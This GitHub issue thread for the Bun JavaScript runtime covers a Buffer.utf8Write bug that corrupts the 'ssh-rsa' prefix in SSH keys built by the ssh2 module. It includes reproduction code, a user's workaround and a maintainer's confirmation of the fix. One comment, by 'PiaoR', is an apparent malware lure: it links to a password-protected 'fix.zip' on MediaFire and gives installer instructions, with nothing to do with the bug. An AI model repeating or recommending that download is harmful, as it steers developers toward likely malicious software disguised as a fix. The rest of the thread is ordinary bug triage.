### ISSUE TITLE
buffer.utf8Write problem (within ssh2 module)

### ISSUE THREAD

**Issue by rgillan** [oven-sh/bun#13581]
### What version of Bun is running?

1.1.27-canary.14+11d7a9d5e

### What platform is your computer?

Linux 6.8.0-1008-raspi aarch64 aarch64

### What steps can reproduce the bug?

We have identified that the buffer created with the ssh public key has a corruption, which is causing the key exchange to fail on initial server connection.  It appears that the buffer.utf8Write method is being called to pass in 'ssh-rsa' and this fails when running with bun.  Expect that this is an internal nodejs buffer method (as it's not detailed in the nodejs docs) and may just be returning random content.  We do see it defined in JSBuffer.cpp though.
This can be tested with the following:
```
// check buffer.utf8Write functionality

const n = Buffer.from([0,203,137,87,196,186,197,81,205,203,66,27,11,76,39,3,17,222,80,161,79,165,213,221,116,67,17,228,122,247,188,125,142,171,65,44,52,202,112,48,112,200,206,89,186,57,209,175,49,51,180,240,211,128,99,94,93,9,239,199,196,187,160,119,67,116,13,69,82,209,99,147,197,104,103,201,15,27,133,184,54,90,93,212,168,74,3,247,204,94,65,153,99,73,251,3,17,172,95,20,213,142,40,99,39,145,175,209,146,57,210,113,108,149,71,171,67,252,180,254,189,18,221,185,165,119,237,247,173,100,78,3,65,137,165,242,91,99,205,185,123,68,180,65,170,139,1,213,225,69,20,108,39,221,107,105,103,171,7,53,31,227,78,39,10,114,71,126,248,182,62,121,78,206,36,127,50,224,125,173,159,207,61,70,61,38,16,27,118,247,237,214,229,29,53,117,84,237,190,165,237,217,191,29,52,220,225,16,137,218,138,12,83,53,114,85,249,43,233,50,131,164,176,146,230,119,206,142,84,136,197,193,140,75,94,138,128,73,3,180,91,76,40,6,192,15,68,187,222,255,206,68,84,251,163,177,243]);
const e = Buffer.from([1,0,1]);

function writeUInt32BE(buf, value, offset) {
  buf[offset++] = (value >>> 24);
  buf[offset++] = (value >>> 16);
  buf[offset++] = (value >>> 8);
  buf[offset++] = value;
  return offset;
}

function genOpenSSHRSAPub(n, e) {
  const publicKey = Buffer.allocUnsafe(4 + 7 + 4 + e.length + 4 + n.length);

  writeUInt32BE(publicKey, 7, 0);
  publicKey.utf8Write('ssh-rsa', 4, 7);

  let i = 4 + 7;
  writeUInt32BE(publicKey, e.length, i);
  publicKey.set(e, i += 4);

  writeUInt32BE(publicKey, n.length, i += e.length);
  publicKey.set(n, i + 4);

  return publicKey;
}

const publicKey = genOpenSSHRSAPub(n, e);

console.log('publicKey: ' + JSON.stringify(publicKey));
```

### What is the expected behavior?

The desired behavior is that the phrase 'ssh-rsa' is written into the buffer from position 4 (7 characters long).  This should result in buffer contents of [115,115,104,45,114,115,97] for those 7 characters.  In this specific case, this identifies the required ssh key format.

### What do you see instead?

The buffer contents from position 4 for the 7 characters is [115,115,104,0,0,0,0] (and we have also seen [115,115,104,0,253,0,19]).

### Additional information

Happy to help debug if someone can point me to where in the bun code this gets implemented.

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Jarred-Sumner** [comment]
oh very interesting

**Comment by Jarred-Sumner** [comment]
not at all what i expected

**Comment by rgillan** [comment]
Not sure it's the last problem with ssh2, but replacing that line with
```
publicKey.write('ssh-rsa', 4, 7, 'utf8');
```
gets the key buffer constructed correctly.  Will keep digging as to the next step in the key exchange that's still not working

**Comment by Jarred-Sumner** [comment]
> Not sure it's the last problem with ssh2, but replacing that line with

yeah the bug here was that our implementation of *write was different and buggier than Buffer.prototype.write. I have fixed the bug and added test coverage to prevent regressions in #13583

**Comment by rgillan** [comment]
@Jarred-Sumner thanks for helping get to the resolution on this.  The great news is that with this fixed (did a full search and replace in 136 locations in the ssh2 codebase) the key exchange and server functionality works using this module now.

**Comment by rgillan** [comment]
@Jarred-Sumner big thanks.  ssh2/server works out of the box with 1.1.27.  Cheers Rob
